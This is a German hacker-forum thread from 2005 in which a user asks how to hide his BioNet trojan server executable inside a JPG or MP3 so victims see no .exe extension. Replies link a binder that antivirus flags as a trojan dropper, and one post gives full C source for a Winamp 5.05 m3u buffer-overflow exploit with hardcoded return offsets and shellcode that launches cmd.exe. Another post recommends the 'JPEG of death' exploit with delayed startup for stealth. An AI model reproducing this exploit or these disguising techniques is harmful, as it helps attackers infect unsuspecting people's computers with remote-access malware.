.exe in.jpg oder irgendwas anderes

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Mewon87, 18. Oktober 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 18. Oktober 2005
    Hab mir gerad alle Seiten durchgeblättert und nichts gefunden was mir Hilft.
    Ich brauche ein Prog. welchen meine Server.exe mir einem Bild oder einer Mp³ Datei verbindet, ohne das ich eine .exe endung bekomme.
    Achja, ich benutze BioNet 4.02 fals es von Bedeutung ist.
    Könntet ihr mir da vieleicht ein Paar namen schreiben oder Links Posten, damit ich da ran komme?
    Es wäre zu freundlich..

    MFG
    Mewon87
     
  2. 18. Oktober 2005
    http://www.geocities.com/benjodj/downloads/newjoiner_exebinder.zip

    versuch den mal.

    weiss aber nich, ob da nich n virus drinsteckt, also öffnen auf eigene gefahr, lieber nochma AV drüberlaufen lassen. -> nich getestet!
     
  3. 18. Oktober 2005
    mein av(Nod32) sacht das da viele infektionen drinne sind und er startet nen prozess sobald man es entpackt hat
     
  4. 18. Oktober 2005
    Rein technisch nicht möglich, da *.mp3 / *.bmp/*.jpg.. nicht als ausführbare Daten interpretiert werden und somit, egal was in der Datei ist, nicht ausgeführt werden.
    (außer man verwendet eine Schwachstelle z.B. in der Grafik-Lib von Windows um mittels Pufferüberlauf die Rücksprungsaddresse zu manipulieren und um so in den Code zu springen (was in deinem Fall jedoch schwachsinnig ist da du den kompletten Trojaner als Shellcode (nicht als EXE) in der Datei verstecken müsstest..))
     
  5. 18. Oktober 2005
    -trojan-dropper.win32.multibinder.12
    is drinnen
    aber kanns sein das er nur meckert,weils nen binder is und nicht weil nen virus drinnen is?
    weil: multibinder.12?
     
  6. 18. Oktober 2005
    naja du hättest schhon sagen können das du vom jpeg xploit sprichst

    evtl intressierts ja wirklich einen...

    ntpacker wird als multibinder erkannt von daher alles crap xodox hat das wichtige ja shcon gepostet

    schönes leben noch

    moep_rush
     
  7. 18. Oktober 2005
    so um es auch dem Herr moep rechtzumachen:
    Diese Exploit bezieht sich auf eine Pufferüberlaufs-Schwachstelle wobei ein zulanger ncda:// Tag die Retturnaddresse von Winamp 5.05 überschreibt beim öffnen einer Playlist-Datei (m3u).
    Code:
    #include <stdio.h>
    #include <stdlib.h>
    
    #define EIP "\x9F\x44\x1B\x5F" /* Offset of JMP ESP in olepro32.dll wXP SP2 */
    #define OFFSET 36
    #define HEADER "#EXTM3U\n#EXTINF:0,DJ XodoX - XODOX WAS SONST\ncda://"
    #define PADDING "CRAP"
    
    char shellcode[]=
    "\x8B\xE5\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6"
    "\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
    "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\xB8" 
    "\xC7\x93\xBF\x77" /* Offset of system() in msvcrt.dll wXP SP2 */
    "\x50\x8D\x5D\xF8\x53\xFF\xD0\n\r";
    
    int main(int argc, char* argv[]) {
     if(argc < 2)
     {
     printf("usage: ./winamp5.05_exploit outputfile.m3u\n");
     exit(-1);
     }
    int i;
    FILE *output;
    char *string;
    if ((output = fopen (argv[1], "w")) == NULL) 
     {
     printf ("Can't open file.\n");
     exit(-1);
     }
     fwrite (HEADER, 1, strlen (HEADER), output);
     for(i=0;i<OFFSET;i+=4)
     {
     fwrite(EIP, 1, strlen (EIP), output);
     }
     fwrite (PADDING , 1, strlen(PADDING) , output); 
     fwrite (shellcode , 1, strlen(shellcode) , output);
     fclose (output);
    return 0;
    }
    
    
     
  8. 18. Oktober 2005
    genau gesehen bezieht es sich nicht auf mp3 sondern auf das playlist format m3u und einen evtl dort vorhandenen pufferüberlauf in verbindung mit winamp v 5.0.5


    greetz moep



    pls closen - artet aus


    ps : *nach weitren fehlern such damit xdox nomal editen muss *

    edit2 :// comment by myself damn


    ps : mit etwas aufwand kann man auch code in ein jpeg packen...aber der jpeg of death xploit mit webdl funktion tuts auch und dank delayed startup wirds auch n bissle unauffälliger
     
  9. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.